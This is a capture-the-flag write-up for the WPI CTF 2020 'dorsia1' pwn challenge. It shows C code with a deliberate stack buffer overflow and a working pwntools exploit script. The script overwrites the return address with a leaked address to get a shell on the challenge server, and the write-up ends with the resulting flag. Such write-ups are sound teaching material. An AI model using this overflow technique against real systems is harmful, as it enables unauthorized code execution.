## dorsia1

* **CTF:** WPI CTF 2020
* **Category:** pwn
* **Points:** 100
* **Author(s):** b0uldrr
* **Date:** 18/04/20

---

### Challenge
```
http://us-east-1.linodeobjects.com/wpictf-challenge-files/dorsia.webm The first card.

nc dorsia1.wpictf.xyz 31337 or 31338 or 31339

made by: awg

Hint: Same libc as dorsia4, but you shouldn't need it to solve.

```

### Solution

Clicking the link the challenge description opened a video which displayed the source code for 4 different functions, each used by the 4 different "dorsia" challenges in this CTF. This was dorsia 1, so we were interested in the first source code displayed:

![code](images/code.png)

```c
#include <stdlib.h>
#include <stdio.h>

void main() {
        char a[69];
        printf("%p\n", system+765772);
        fgets(a,96,stdin);
}
```

We can see an overflow vulnerability caused by the `a` array being initialised to a size of 69 bytes but the `fgets` call specifying a buffer size of 96 bytes.

Connecting to the remote server, we can see the code in action:

```
$ nc dorsia1.wpictf.xyz 31337
0x7ac5a2e0038c

```

We're provided with an address and then a chance to supply an input into our vulnerable buffer. I wasn't really sure what to do with that address other than use it to overwrite the return address on the stack and see where it takes us. I wrote a python script to do that and then switch to interactive mode after our payload.

```python
#! /usr/bin/python3
import pwn

conn = pwn.remote("dorsia1.wpictf.xyz", 31337)

# receive the return address and format it to an integer for use below
res  = conn.recvline()
addr = int(res.strip(),16)

payload  = b'a' * 69        # fill up our buffer
payload += pwn.p64(0xbbbb)  # overflow the base pointer
payload += pwn.p64(addr)    # overwrite the return address with the provided address

conn.sendline(payload)

# switch to interactive mode so we can find the flag
conn.interactive()
```
After running it, we get a shell in a directory with flag.txt.

```
$ ./soln.py 
[+] Opening connection to dorsia1.wpictf.xyz on port 31337: Done
[*] Switching to interactive mode
$ ls
flag.txt
nanobuf
run_problem.sh
$ cat flag.txt
WPI{FEED_ME_A_STRAY_CAT}
```
---

### Flag 
```
dorsia1: WPI{FEED_ME_A_STRAY_CAT}
```
